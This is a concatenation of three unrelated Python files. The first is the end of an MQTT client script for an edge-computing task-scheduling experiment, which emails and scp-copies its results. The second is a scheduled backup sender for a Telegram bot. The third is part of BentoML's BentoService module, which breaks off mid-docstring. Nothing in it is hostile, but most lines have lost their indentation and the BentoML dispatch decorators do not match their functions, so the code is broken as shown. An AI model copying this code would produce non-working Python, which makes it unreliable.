task_client.connect(broker_ip, broker_port_no, 60)
task_client.loop_start()
while True:
if stop():
task_client.loop_stop()
task_client.disconnect()
break
def ip_address():
    # Determine the outgoing interface's IP address and close the socket afterwards.
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    ip = s.getsockname()[0]
    s.close()
    return ip
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results {} {} {}'.format(filename[algo_id], get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def client_id(client_ip):
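    # Zero-pads the last octet of an IP address to three digits; the result doubles as
    # the node's MQTT topic name. Illustrative examples (hypothetical addresses):
    #   client_id('192.168.122.5')   -> '005'
    #   client_id('192.168.122.45')  -> '045'
    #   client_id('192.168.122.111') -> '111'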
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
total_task_sent = 0
total_split_task = 0
task_dist = {1: 0, 2: 0, 3: 0}
def task_details(tasks):
global task_dist, total_task_sent, total_split_task
total_task_sent += len(tasks)
for task in tasks:
total_split_task += tasks[task]['wcet']
task_dist[tasks[task]['wcet']] += 1
def name_task(task_list, node_id, seq_no):
    # task naming nomenclature: task_id.node_id.client_id.sequence_no => t2.110.170.10
    # returns the task list and waiting-time dict with this identification applied
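    # Illustrative example (hypothetical values): with client_id_ == '170',
    #   name_task(({'t2': spec}, {'t2': wait}), node_id='110', seq_no=10)
    # returns ({'t2.110.170.10': spec}, {'t2.110.170.10': wait}).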
return {i + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[0][i] for i in task_list[0]}, \
{k + '.' + str(node_id) + '.' + client_id_ + '.' + str(seq_no): task_list[1][k] for k in task_list[1]}
def namestr(obj):
namespace = globals()
return [name for name in namespace if namespace[name] is obj]
def split_list(data, _id_):
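    # Splits the shared task workload between the three client hosts by hostname suffix:
    # host 4 takes indices 0-865, host 5 takes 866-1732 and host 6 takes the remainder.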
if _id_ == 4: # 866
return data[:866]
if _id_ == 5: # 867
return data[866:1733]
if _id_ == 6: # 867
return data[1733:]
def save_data():
result = f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} " \
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}" \
f"\nrecord{len(hosts)} = {record} \nhost_names{len(hosts)} = {host_dict}" \
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}" \
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = " \
f"{total_split_task} " \
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n" \
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}" \
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}" \
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}" \
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
list_result = [
f"\ntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_executed_on_time} ",
f"\nuntimely{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {tasks_not_executed_on_time}",
f"\nrecord{len(hosts)} = {record} ",
f"\nhost_names{len(hosts)} = {host_dict}",
f"\n{namestr(total_task_sent)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {total_task_sent}"
f"\n{namestr(total_split_task)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = "
f"{total_split_task} "
f"\n{namestr(task_dist)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {task_dist}\n",
f"\n{namestr(timely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {timely_}",
f"\n{namestr(untimely_)[0]}{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {untimely_}",
f"\nu_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {u_time}",
f"\nt_time{get_hostname()[-1]}_{algo_id}_{len(hosts)} = {t_time}"
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
else:
os.system(f'mkdir -p {path_}')
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py"
os.system(cmd)
file_ = open(f'{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datal.py'
os.system(cmd)
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}c{get_hostname()[-1]}_{algo_id}_{len(hosts)}datap.py",
f"mec@{ho['osboxes-0']}:{send_path}"])
send_email(result)
def run_me(mec_dict, algo_id_, exp_kind): # get_mec_details(mec_dict, algo_id_) homo/hetero
global record
global client_id_
global seq
os.system('clear')
print("================== Welcome to Client Platform ===================")
get_mec_details(mec_dict=mec_dict, algo_id_=algo_id_) # get_mec_details(mec_dict, algo_id_)
client_id_ = client_id(ip_address())
stop = False
redeem_task = Thread(target=receive_mec_start, args=(lambda: stop,))
# redeem_task.daemon = True
redeem_task.start()
time.sleep(2)
exp_type = {'homo': homo, 'hetero': hetero}
dst = exp_type[exp_kind]
print('Client is connected to servers: {}'.format(hosts))
data = {4: dst.mec4, 7: dst.mec7, 10: dst.mec10}
task_bank = {4: dst.data_list4, 5: dst.data_list5, 6: dst.data_list6}
cmd = ['hostname']
host_id = str(sp.check_output(cmd, shell=True), 'utf-8')[-2]
t_list = task_bank[int(host_id)]
print('experiment started!')
_data_ = split_list(data[len(hosts)], int(host_id))
for i in range(len(_data_)):
seq = i
        rand_host = hosts[int(_data_[i]) - 1]  # host selection using the generated Gaussian distribution
_task_ = t_list[i] # tasks, waiting time
_tasks_list = name_task(_task_, client_id(rand_host), i) # id's tasks => ({tasks}, {waiting time})
task_details(_tasks_list[0])
record.append([_tasks_list, host_dict[rand_host]])
for task in _tasks_list[0]:
sec = dt.timedelta(seconds=_task_[1][task[:2]][1])
if i not in task_record: # task_record= {seq_no:{task:[duration,start_time,finish_time]}}
task_record[i] = {task: [sec, get_time()]}
else:
task_record[i][task] = [sec, get_time()]
# client(_tasks_list, rand_host)
task_client.publish(client_id(rand_host), "t {}".format(_tasks_list))
print("Sent {} to {} node_id {} \n\n".format(_tasks_list, rand_host, client_id(rand_host)))
drawnow(plot_performance)
time.sleep(3)
time.sleep(r.uniform(0, 30))
# messenger.publish(topic=control_topic, data=pickle.dumps(['client finish', host_id]))
task_client.publish('control/control', pickle.dumps(['client finish', host_id]))
print('Client Finished')
time.sleep(150)
print('\nProgramme terminating')
save_data()
time.sleep(1)
cmd = 'kill -9 {}'.format(os.getpid())
os.system(cmd)
def get_mec_details(mec_dict, algo_id_):
global hosts
global host_dict
global algo_id
global ho
ho = mec_dict # {hostname: ip}
algo_id = algo_id_
hosts = sorted(list(ho.values())) # list of Ips
host_dict = dict(zip(list(ho.values()), list(ho.keys())))
def main():
global send_path
# (mec_dict, algo_id_, exp_kind, send_path)
parser = argparse.ArgumentParser() # --hosts= --al_id= --kind= --s_path=
parser.add_argument('--hosts', type=str, help="{hostname: 'ip address', ...} of all mec")
parser.add_argument('--al_id', type=int, help='algorithm id')
parser.add_argument('--kind', type=str, help="kind of experiment, homo or hetero")
parser.add_argument('--s_path', type=str, default='/home/mec/result/python', help='Path to send result to')
args = parser.parse_args()
h_hosts = ast.literal_eval(args.hosts)
send_path = args.s_path
run_me(mec_dict=h_hosts, algo_id_=args.al_id, exp_kind=args.kind)
if __name__ == '__main__':
main()
|
backups.py
|
# Copyright (C) 2018-2020 Amano Team <contact@amanoteam.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
# IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
import time
import schedule
from datetime import datetime
from utils import backup_sources
from multiprocessing import Process
from config import backups_chat, backup_hours, na_bot
def backup_func():
cstrftime = datetime.now().strftime('%d/%m/%Y - %H:%M:%S')
file = backup_sources()
try:
na_bot.sendDocument(backups_chat, open(file, 'rb'), caption="📅 " + cstrftime + "\n_Auto generated._", parse_mode='Markdown')
finally:
os.remove(file)
def backup_scheduler(target):
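    # Registers one daily run of `target` per configured hour, then polls the pending
    # jobs every five seconds in an endless loop.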
for hour in backup_hours:
schedule.every().day.at(hour).do(target)
while True:
schedule.run_pending()
time.sleep(5)
def backup_service():
p = Process(target=backup_scheduler, args=(backup_func,))
p.start()
|
__init__.py
|
# Copyright 2019 Atalaya Tech, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from multipledispatch import dispatch
import inspect
import logging
import multiprocessing
import os
import re
import subprocess
import sys
import tempfile
import threading
import uuid
from datetime import datetime
from dependency_injector.wiring import Provide, inject
from typing import List
from bentoml.adapters import BaseInputAdapter, BaseOutputAdapter, DefaultOutput
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import BentoMLException, InvalidArgument, NotFound
from bentoml.saved_bundle import save_to_dir
from bentoml.saved_bundle.config import (
DEFAULT_MAX_BATCH_SIZE,
DEFAULT_MAX_LATENCY,
SavedBundleConfig,
)
from bentoml.saved_bundle.pip_pkg import seek_pip_packages
from bentoml.service.artifacts import ArtifactCollection, BentoServiceArtifact
from bentoml.service.env import BentoServiceEnv
from bentoml.service.inference_api import InferenceAPI
from bentoml.utils.hybridmethod import hybridmethod
ARTIFACTS_DIR_NAME = "artifacts"
BENTOML_RESERVED_API_NAMES = [
"index",
"swagger",
"docs",
"healthz",
"metrics",
"feedback",
]
logger = logging.getLogger(__name__)
prediction_logger = logging.getLogger("bentoml.prediction")
def validate_inference_api_name(api_name: str):
if not api_name.isidentifier():
raise InvalidArgument(
"Invalid API name: '{}', a valid identifier may only contain letters,"
" numbers, underscores and not starting with a number.".format(api_name)
)
if api_name in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API name: '{}' is reserved for infra endpoints".format(api_name)
)
def validate_inference_api_route(route: str):
if re.findall(
r"[?#]+|^(//)|^:", route
): # contains '?' or '#' OR start with '//' OR start with ':'
# https://tools.ietf.org/html/rfc3986#page-22
raise InvalidArgument(
"The path {} contains illegal url characters".format(route)
)
if route in BENTOML_RESERVED_API_NAMES:
raise InvalidArgument(
"Reserved API route: '{}' is reserved for infra endpoints".format(route)
)
@dispatch(BaseInputAdapter, BaseOutputAdapter, str, str, str, int, int, bool)
def api_decorator(
*args,
input: BaseInputAdapter = None,
output: BaseOutputAdapter = None,
api_name: str = None,
route: str = None,
api_doc: str = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
batch=False,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
:param input: InputAdapter instance of the inference API
:param output: OutputAdapter instance of the inference API
    :param api_name: API name, defaults to the name of the user-defined callback
        function
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
    :param api_doc: user-facing documentation of the inference API, defaults to the
        user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(input=JsonInput(), batch=True)
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(input=DataframeInput(input_json_orient='records'), batch=True)
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
if input is None:
# Raise error when input adapter class passed without instantiation
if not args or not (
inspect.isclass(args[0]) and issubclass(args[0], BaseInputAdapter)
):
raise InvalidArgument(
"BentoService @api decorator first parameter must "
"be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter "
)
# noinspection PyPep8Naming
InputAdapter = args[0]
input_adapter = InputAdapter(*args[1:], **kwargs)
output_adapter = DefaultOutput()
else:
assert isinstance(input, BaseInputAdapter), (
"API input parameter must be an instance of a class derived from "
"bentoml.adapters.BaseInputAdapter"
)
input_adapter = input
output_adapter = output or DefaultOutput()
setattr(func, "_is_api", True)
setattr(func, "_input_adapter", input_adapter)
setattr(func, "_output_adapter", output_adapter)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_mb_max_batch_size", mb_max_batch_size)
setattr(func, "_mb_max_latency", mb_max_latency)
setattr(func, "_batch", batch)
return func
return decorator
@dispatch(api_name=str, route=str, api_doc=str, http_methods=list, module_path=str, mb_max_batch_size=int, mb_max_latency=int)
def api_decorator(
*args,
api_name: str = None,
route: str = None,
api_doc: str = None,
http_methods: List[str] = None,
mb_max_batch_size: int = DEFAULT_MAX_BATCH_SIZE,
mb_max_latency: int = DEFAULT_MAX_LATENCY,
**kwargs,
): # pylint: disable=redefined-builtin
"""
A decorator exposed as `bentoml.api` for defining Inference API in a BentoService
class.
    :param api_name: API name, defaults to the name of the user-defined callback
        function
:param http_methods: the list of http methods for the API endpoint
:param route: Specify HTTP URL route of this inference API. By default,
`api.name` is used as the route. This parameter can be used for customizing
the URL route, e.g. `route="/api/v2/model_a/predict"`
Default: None (the same as api_name)
    :param api_doc: user-facing documentation of the inference API, defaults to the
        user-defined callback function's docstring
:param mb_max_batch_size: The maximum size of requests batch accepted by this
inference API. This parameter governs the throughput/latency trade off, and
avoids having large batches that exceed some resource constraint (e.g. GPU
memory to hold the entire batch's data). Default: 1000.
:param mb_max_latency: The latency goal of this inference API in milliseconds.
Default: 10000.
Example usage:
>>> from bentoml import BentoService, api
>>> from bentoml.adapters import JsonInput, DataframeInput
>>>
>>> class FraudDetectionAndIdentityService(BentoService):
>>>
>>> @api(api_name="fraud",route="fraud",http_methods=['GET'])
>>> def fraud_detect(self, json_list):
>>> # user-defined callback function that process inference requests
>>>
>>> @api(route="identity_check",api_doc="This is the docs")
>>> def identity(self, df):
>>> # user-defined callback function that process inference requests
"""
def decorator(func):
_api_name = func.__name__ if api_name is None else api_name
_api_route = _api_name if route is None else route
validate_inference_api_name(_api_name)
validate_inference_api_route(_api_route)
_api_doc = func.__doc__ if api_doc is None else api_doc
_http_methods = http_methods if http_methods else ['GET']
setattr(func, "_is_api", True)
setattr(func, "_api_name", _api_name)
setattr(func, "_api_route", _api_route)
setattr(func, "_api_doc", _api_doc)
setattr(func, "_http_methods", _http_methods)
# TODO: This could be a feature for scaling
# setattr(func, "_mb_max_batch_size", mb_max_batch_size)
# setattr(func, "_mb_max_latency", mb_max_latency)
return func
return decorator
def web_static_content_decorator(web_static_content):
"""Define web UI static files required to be bundled with a BentoService
Args:
        web_static_content: path to the directory containing index.html and the static dir
>>> @web_static_content('./ui/')
>>> class MyMLService(BentoService):
>>> pass
"""
def decorator(bento_service_cls):
bento_service_cls._web_static_content = web_static_content
return bento_service_cls
return decorator
def artifacts_decorator(artifacts: List[BentoServiceArtifact]):
"""Define artifacts required to be bundled with a BentoService
Args:
artifacts (list(bentoml.artifact.BentoServiceArtifact)): A list of desired
artifacts required by this BentoService
"""
def decorator(bento_service_cls):
artifact_names = set()
for artifact in artifacts:
if not isinstance(artifact, BentoServiceArtifact):
raise InvalidArgument(
"BentoService @artifacts decorator only accept list of "
"BentoServiceArtifact instances, instead got type: '%s'"
% type(artifact)
)
if artifact.name in artifact_names:
raise InvalidArgument(
"Duplicated artifact name `%s` detected. Each artifact within one"
"BentoService must have an unique name" % artifact.name
)
artifact_names.add(artifact.name)
bento_service_cls._declared_artifacts = artifacts
bento_service_cls._env = BentoServiceEnv(
infer_pip_packages=True
)
return bento_service_cls
return decorator
def env_decorator(
pip_dependencies: List[str] = None,
pip_packages: List[str] = None,
pip_index_url: str = None,
pip_trusted_host: str = None,
pip_extra_index_url: str = None,
auto_pip_dependencies: bool = None,
infer_pip_packages: bool = False,
requirements_txt_file: str = None,
conda_channels: List[str] = None,
conda_overwrite_channels: bool = False,
conda_override_channels: bool = False,
conda_dependencies: List[str] = None,
conda_env_yml_file: str = None,
setup_sh: str = None,
docker_base_image: str = None,
zipimport_archives: List[str] = None,
):
"""Define environment and dependencies required for the BentoService being created
Args:
        pip_packages: list of pip packages required, specified by package name
or with specified version `{package_name}=={package_version}`
pip_dependencies: same as pip_packages but deprecated
pip_index_url: passing down to pip install --index-url option
pip_trusted_host: passing down to pip install --trusted-host option
pip_extra_index_url: passing down to pip install --extra-index-url option
infer_pip_packages: whether to automatically find all the required
pip dependencies and pin their version
auto_pip_dependencies: same as infer_pip_packages but deprecated
requirements_txt_file: path to the requirements.txt where pip dependencies
are explicitly specified, with ideally pinned versions
conda_channels: list of extra conda channels other than default channels to be
used. This is equivalent to passing the --channels to conda commands
conda_override_channels: ensures that conda searches only your specified
channel and no other channels, such as default channels.
This is equivalent to passing the --override-channels option to conda
commands, or adding `nodefaults` to the `channels` in the environment.yml
conda_overwrite_channels: aliases to `override_channels`
conda_dependencies: list of conda dependencies required
conda_env_yml_file: use a pre-defined conda environment yml file
setup_sh: user defined setup bash script, it is executed in docker build time
docker_base_image: used for customizing the docker container image built with
BentoML saved bundle. Base image must either have both `bash` and `conda`
installed; or have `bash`, `pip`, `python` installed, in which case the user
is required to ensure the python version matches the BentoService bundle
zipimport_archives: list of zipimport archives paths relative to the module path
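    Example usage (illustrative sketch; the package names below are placeholders):
    >>> @env(pip_packages=["scikit-learn", "pandas"], infer_pip_packages=False)
    >>> class MyPredictionService(BentoService):
    >>>     pass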
"""
if requirements_txt_file:
if pip_packages:
logger.warning("Ignoring pip_packages as requirements_txt_file is set.")
if pip_index_url or pip_trusted_host or pip_extra_index_url:
logger.warning(
"Ignoring pip related options as requirements_txt_file is set."
)
if pip_dependencies is not None:
logger.warning(
"`pip_dependencies` parameter in `@env` is being deprecated soon, use "
"`pip_packages` instead, e.g. `@env(pip_packages=[\"numpy\"])`"
)
if auto_pip_dependencies is not None:
logger.warning(
"`auto_pip_dependencies` parameter in `@env` is being deprecated soon,"
"use `infer_pip_packages` instead, e.g. `@env(infer_pip_packages=True)`"
)
def decorator(bento_service_cls):
bento_service_cls._env = BentoServiceEnv(
pip_packages=pip_packages or pip_dependencies,
pip_index_url=pip_index_url,
pip_trusted_host=pip_trusted_host,
pip_extra_index_url=pip_extra_index_url,
infer_pip_packages=infer_pip_packages or auto_pip_dependencies,
requirements_txt_file=requirements_txt_file,
conda_channels=conda_channels,
conda_override_channels=conda_override_channels,
conda_overwrite_channels=conda_overwrite_channels,
conda_dependencies=conda_dependencies,
conda_env_yml_file=conda_env_yml_file,
setup_sh=setup_sh,
docker_base_image=docker_base_image,
zipimport_archives=zipimport_archives,
)
return bento_service_cls
return decorator
def ver_decorator(major, minor):
"""Decorator for specifying the version of a custom BentoService.
Args:
major (int): Major version number for Bento Service
minor (int): Minor version number for Bento Service
BentoML uses semantic versioning for BentoService distribution:
* MAJOR is incremented when you make breaking API changes
* MINOR is incremented when you add new functionality without breaking the
existing API or functionality
* PATCH is incremented when you make backwards-compatible bug fixes
    'Patch' is provided (or auto-generated) when calling BentoService#save,
    while 'Major' and 'Minor' can be defined with the '@ver' decorator
>>> from bentoml import ver, artifacts
>>> from bentoml.service.artifacts.common import PickleArtifact
>>>
>>> @ver(major=1, minor=4)
>>> @artifacts([PickleArtifact('model')])
>>> class MyMLService(BentoService):
>>> pass
>>>
>>> svc = MyMLService()
>>> svc.pack("model", trained_classifier)
>>> svc.set_version("2019-08.iteration20")
>>> svc.save()
>>> # The final produced BentoService bundle will have version:
>>> # "1.4.2019-08.iteration20"
"""
def decorator(bento_service_cls):
bento_service_cls._version_major = major
bento_service_cls._version_minor = minor
return bento_service_cls
return decorator
def validate_version_str(version_str):
"""
    Validate that the version string is either a simple version string that:
    * consists only of ALPHA / DIGIT / "-" / "." / "_"
    * is between 1 and 128 characters long
Or a valid semantic version https://github.com/semver/semver/blob/master/semver.md
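    Illustrative examples (not taken from the original source):
    >>> validate_version_str("20191009135240_D246ED")  # simple version string: accepted
    >>> validate_version_str("1.4.0-rc.1")             # valid semantic version: accepted
    >>> validate_version_str("latest")                 # raises InvalidArgument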
"""
regex = r"[A-Za-z0-9_.-]{1,128}\Z"
semver_regex = r"^(?P<major>0|[1-9]\d*)\.(?P<minor>0|[1-9]\d*)\.(?P<patch>0|[1-9]\d*)(?:-(?P<prerelease>(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\.(?:0|[1-9]\d*|\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\+(?P<buildmetadata>[0-9a-zA-Z-]+(?:\.[0-9a-zA-Z-]+)*))?$" # noqa: E501
if (
re.match(regex, version_str) is None
and re.match(semver_regex, version_str) is None
):
raise InvalidArgument(
            'Invalid BentoService version: "{}", it can only consist of'
            ' ALPHA / DIGIT / "-" / "." / "_", and must be less than '
            "128 characters".format(version_str)
)
if version_str.lower() == "latest":
raise InvalidArgument('BentoService version can not be set to "latest"')
def save(bento_service, base_path=None, version=None, labels=None):
"""
Save and register the given BentoService via BentoML's built-in model management
system. BentoML by default keeps track of all the SavedBundle's files and metadata
in local file system under the $BENTOML_HOME(~/bentoml) directory. Users can also
configure BentoML to save their BentoService to a shared Database and cloud object
storage such as AWS S3.
:param bento_service: target BentoService instance to be saved
:param base_path: optional - override repository base path
:param version: optional - save with version override
:param labels: optional - user defined labels
:return: saved_path: file path to where the BentoService is saved
"""
logger.warning(
"`from bentoml import save` is being deprecated soon, use BentoService#save "
"and BentoService#save_to_dir instead."
)
from bentoml.yatai.client import YataiClient
from bentoml.yatai.yatai_service import get_yatai_service
if base_path:
yatai_service = get_yatai_service(file_system_directory=base_path)
yatai_client = YataiClient(yatai_service)
else:
yatai_client = YataiClient()
return yatai_client.repository.upload(bento_service, version, labels)
class BentoService:
"""
BentoService is the base component for building prediction services using BentoML.
    BentoService provides an abstraction for describing the model artifacts and
    environment dependencies required for a prediction service, and allows users to
    create inference APIs that define the inference logic and how the underlying model
    can be served.
Each BentoService can contain multiple models and serve multiple inference APIs.
Usage example:
>>> from bentoml import BentoService, env, api, artifacts
>>> from bentoml.adapters import DataframeInput
>>> from bentoml.frameworks.sklearn import SklearnModelArtifact
>>>
>>> @artifacts([SklearnModelArtifact('clf')])
>>> @env(pip_packages=["scikit-learn"])
>>> class MyMLService(BentoService):
>>>
>>> @api(http_methods=['GET'],api_name="predict")
>>> def predict(self, df):
>>> return self.artifacts.clf.predict(df)
>>>
>>> if __name__ == "__main__":
>>> bento_service = MyMLService()
>>> bento_service.pack('clf', trained_classifier_model)
>>> bento_service.save_to_dir('/bentoml_bundles')
"""
# List of inference APIs that this BentoService provides
_inference_apis: List[InferenceAPI] = []
    # Name of this BentoService. It defaults to the class name of this BentoService class
_bento_service_name: str = None
# For BentoService loaded from saved bundle, this will be set to the path of bundle.
# When user install BentoService bundle as a PyPI package, this will be set to the
# installed site-package location of current python environment
_bento_service_bundle_path: str = None
# List of artifacts required by this BentoService class, declared via the `@env`
# decorator. This list is used for initializing an empty ArtifactCollection when
# the BentoService class is instantiated
_declared_artifacts: List[BentoServiceArtifact] = []
# An instance of ArtifactCollection, containing all required trained model artifacts
_artifacts: ArtifactCollection = None
# A `BentoServiceEnv` instance specifying the required dependencies and all system
# environment setups
_env = None
# When loading BentoService from saved bundle, this will be set to the version of
# the saved BentoService bundle
_bento_service_bundle_version = None
# See `ver_decorator` function above for more information
_version_major = None
_version_minor = None
# See `web_static_content` function above for more
_web_static_content = None
def __init__(self):
# When creating BentoService instance from a saved bundle, set version to the
# version specified in the saved bundle
self._bento_service_version = self.__class__._bento_service_bundle_version
self._dev_server_bundle_path: tempfile.TemporaryDirectory = None
self._dev_server_interrupt_event: multiprocessing.Event = None
        self._dev_server_process: multiprocessing.Process = None
self._config_artifacts()
self._config_inference_apis()
self._config_environments()
def _config_environments(self):
self._env = self.__class__._env or BentoServiceEnv()
# for api in self._inference_apis:
# self._env.add_pip_packages(api.input_adapter.pip_dependencies)
# self._env.add_pip_packages(api.output_adapter.pip_dependencies)
for artifact in self.artifacts.get_artifact_list():
artifact.set_dependencies(self.env)
def _config_inference_apis(self):
self._inference_apis = []
for _, function in inspect.getmembers(
self.__class__,
predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
):
if hasattr(function, "_is_api"):
api_name = getattr(function, "_api_name")
route = getattr(function, "_api_route", None)
api_doc = getattr(function, "_api_doc")
http_methods = getattr(function, "_http_methods")
# TODO: Add this while scaling
# mb_max_latency = getattr(function, "_mb_max_latency")
# mb_max_batch_size = getattr(function, "_mb_max_batch_size")
# Bind api method call with self(BentoService instance)
user_func = function.__get__(self)
self._inference_apis.append(
InferenceAPI(
self,
api_name,
api_doc,
user_func=user_func,
http_methods=http_methods,
# TODO: Add this while scaling
# mb_max_latency=mb_max_latency,
# mb_max_batch_size=mb_max_batch_size,
route=route,
)
)
# @dispatch()
# def _config_inference_apis(self):
# self._inference_apis = []
#
# for _, function in inspect.getmembers(
# self.__class__,
# predicate=lambda x: inspect.isfunction(x) or inspect.ismethod(x),
# ):
# if hasattr(function, "_is_api"):
# api_name = getattr(function, "_api_name")
# route = getattr(function, "_api_route", None)
# api_doc = getattr(function, "_api_doc")
# input_adapter = getattr(function, "_input_adapter")
# output_adapter = getattr(function, "_output_adapter")
# mb_max_latency = getattr(function, "_mb_max_latency")
# mb_max_batch_size = getattr(function, "_mb_max_batch_size")
# batch = getattr(function, "_batch")
#
# # Bind api method call with self(BentoService instance)
# user_func = function.__get__(self)
#
# self._inference_apis.append(
# InferenceAPI(
# self,
# api_name,
# api_doc,
# input_adapter=input_adapter,
# user_func=user_func,
# output_adapter=output_adapter,
# mb_max_latency=mb_max_latency,
# mb_max_batch_size=mb_max_batch_size,
# batch=batch,
# route=route,
# )
# )
def _config_artifacts(self):
self._artifacts = ArtifactCollection.from_artifact_list(
self._declared_artifacts
)
if self._bento_service_bundle_path:
# For pip installed BentoService, artifacts directory is located at
# 'package_path/artifacts/', but for loading from bundle directory, it is
# in 'path/{service_name}/artifacts/'
if os.path.isdir(
os.path.join(self._bento_service_bundle_path, ARTIFACTS_DIR_NAME)
):
artifacts_path = os.path.join(
self._bento_service_bundle_path, ARTIFACTS_DIR_NAME
)
else:
artifacts_path = os.path.join(
self._bento_service_bundle_path, self.name, ARTIFACTS_DIR_NAME
)
self.artifacts.load_all(artifacts_path)
@property
def inference_apis(self) -> List[InferenceAPI]:
"""Return a list of user defined API functions
Returns:
list(InferenceAPI): List of Inference API objects
"""
return self._inference_apis
def get_inference_api(self, api_name):
"""Find the inference API in this BentoService with a specific name.
When the api_name is None, this returns the first Inference API found in the
`self.inference_apis` list.
:param api_name: the target Inference API's name
:return:
"""
if api_name:
try:
return next(
(api for api in self.inference_apis if api.name == api_name)
)
except StopIteration:
raise NotFound(
"Can't find API '{}' in service '{}'".format(api_name, self.name)
)
elif len(self.inference_apis) > 0:
return self.inference_apis[0]
else:
raise NotFound(f"Can't find any inference API in service '{self.name}'")
@property
def artifacts(self):
""" Returns the ArtifactCollection instance specified with this BentoService
class
Returns:
